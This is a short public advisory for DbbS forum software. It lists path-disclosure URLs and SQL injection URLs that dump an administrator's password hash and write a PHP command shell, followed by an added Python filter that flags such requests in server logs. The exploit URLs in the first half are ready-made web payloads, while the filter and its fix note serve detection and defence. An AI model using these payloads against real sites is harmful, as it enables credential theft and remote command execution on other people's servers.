DbbS<=2.0-alpha Multiple Vulnerabilities



Special thanks to rgod for his help!!!

Full path disclosure

http://www.site.com/DbbS/topics.php?fcategoryid=' 
http://www.site.com/DbbS/script.php?unavariabile[]
http://www.site.com/DbbS/script.php?GLOBALS[]
http://www.site.com/DbbS/script.php?_SERVER[]

MD5 Password

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/* 

Create shell

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,''%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/* 

Launch a command

http://www.site.com/DbbS/suntzu.php?cmd=dir 

XSS

 

 


by rgod and yamcho
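
Added example (not part of the original advisory and not DbbS code): a Python filter that tags web-server request lines matching the request shapes listed above, namely a non-numeric fcategoryid, UNION SELECT combined with INTO DUMPFILE, and array-typed or superglobal-named parameters. The sample request lines are constructed, and treating fcategoryid as a plain integer id is an assumption.

```python
import re
from urllib.parse import unquote

# PHP superglobal names; no normal form submits one as a parameter name.
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE",
                "_FILES", "_ENV", "_REQUEST", "_SESSION"}
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
INTO_FILE = re.compile(r"\binto\s+(?:dumpfile|outfile)\b", re.I)

# Constructed request lines modelled on the advisory's URLs (output path
# replaced with a placeholder); not taken from any real log.
SAMPLE_REQUESTS = [
    "GET /DbbS/topics.php?fcategoryid=3 HTTP/1.1",
    "GET /DbbS/topics.php?fcategoryid=' HTTP/1.1",
    "GET /DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass"
    "%20INTO%20DUMPFILE'PLACEHOLDER'%20FROM%20forum_membres/* HTTP/1.1",
    "GET /DbbS/script.php?GLOBALS[] HTTP/1.1",
    "GET /DbbS/script.php?_SERVER[] HTTP/1.1",
    "GET /DbbS/index.php HTTP/1.1",
]

def classify(request_line):
    """Return sorted finding tags for one 'METHOD target PROTOCOL' line."""
    try:
        _method, rest = request_line.split(" ", 1)
        target, _proto = rest.rsplit(" ", 1)
    except ValueError:
        return ["malformed-request-line"]
    findings = set()
    for pair in target.partition("?")[2].split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        name, value = unquote(name), unquote(value)
        if "[" in name:
            # Array-typed parameter: low signal alone, since real forms use it.
            findings.add("array-param")
            if name.split("[", 1)[0] in SUPERGLOBALS:
                findings.add("superglobal-param")
        # Assumption: fcategoryid is meant to be a non-negative integer id.
        if name == "fcategoryid" and not re.fullmatch(r"[0-9]+", value):
            findings.add("non-numeric-fcategoryid")
        if UNION_SELECT.search(value):
            findings.add("union-select")
        if INTO_FILE.search(value):
            findings.add("into-dumpfile")
    return sorted(findings)

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify(line) or ["clean"], line)
```

The same integer check on fcategoryid, applied server-side before the value reaches the query, is what closes the injection; the filter only surfaces past attempts in logs.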
